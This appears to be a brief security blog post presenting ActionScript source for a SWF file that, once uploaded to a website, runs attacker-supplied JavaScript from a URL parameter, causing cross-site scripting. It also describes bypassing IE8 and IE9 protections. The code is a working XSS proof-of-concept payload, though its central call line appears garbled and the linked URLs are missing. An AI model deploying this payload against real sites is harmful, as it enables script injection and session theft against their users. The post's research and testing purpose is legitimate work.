As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
Note: IE has a protection to make the “document” object inaccessible when you open a SWF directly in a browser. I have bypassed IE8 protection by using a simple redirection in Javascript. I have also found a noisy way to bypass IE9 protection by opening a new window (you may be able to do it in a less noisy way – please leave your comments if you know any other bypass method).
Here is the actionscript code:
package { import flash.display.Sprite; import flash.external.*; import flash.system.System; public class XSSProject extends Sprite { public function XSSProject() { flash.system.Security.allowDomain("*"); ExternalInterface.marshallExceptions = true; try {"0);}catch(e){};"+root.loaderInfo.parameters.js+"///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/"); } catch(e:Error) { trace(e); } } } }
Compiled file is accessbile via:
Browsers other than IE:;
[1] The other reason to beware (URL:
[2] Flash JavaScript Injection – can make the websites vulnerable to XSS (URL: